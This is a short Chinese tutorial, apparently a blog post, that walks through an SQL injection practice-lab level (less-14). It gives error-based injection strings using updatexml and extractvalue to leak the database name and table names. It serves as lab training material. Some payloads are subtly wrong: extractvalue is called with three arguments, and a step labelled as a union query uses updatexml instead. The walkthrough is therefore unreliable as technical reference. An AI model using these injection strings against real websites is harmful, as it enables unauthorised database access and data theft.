简介
SQL注入(SQL Injection)是一种常见的网络攻击方式,通过向SQL查询中插入恶意的SQL代码,攻击者可以操控数据库,SQL注入是一种代码注入攻击,其中攻击者将恶意的SQL代码插入到应用程序的输入字段中,然后这些输入被传递到数据库服务器上执行。攻击者可以利用这一漏洞执行任意的SQL查询或命令,从而访问或操控数据库中的敏感信息。
SQL注入的一个简要流程:
1、打开目标靶场
2、选择less - 14
3、确定网站可以注入的参数
本关可以直接在输入框中搜索
4、判断闭合方式
本关为 1" #
5、使用报错函数
输入 1" and updatexml(1,1,1) #
6、进行联合查询,修改ID,显示所查询的联合数据
输入 1" and updatexml(1,concat(1,1),1) #
7、查看当前数据库名,数据库版本以及数据库用户
输入 1" and extractvalue(1,concat(1,(select database())),1) #
8、查看网站的数据库里面的所有表名
输入 1" and extractvalue(1,concat(1,(select table_name from information_schema.tables where table_schema='security' limit 0,1)),1) #
以此可以确定自己需要的内容
安全
网络是把双刃剑,安全使用是关键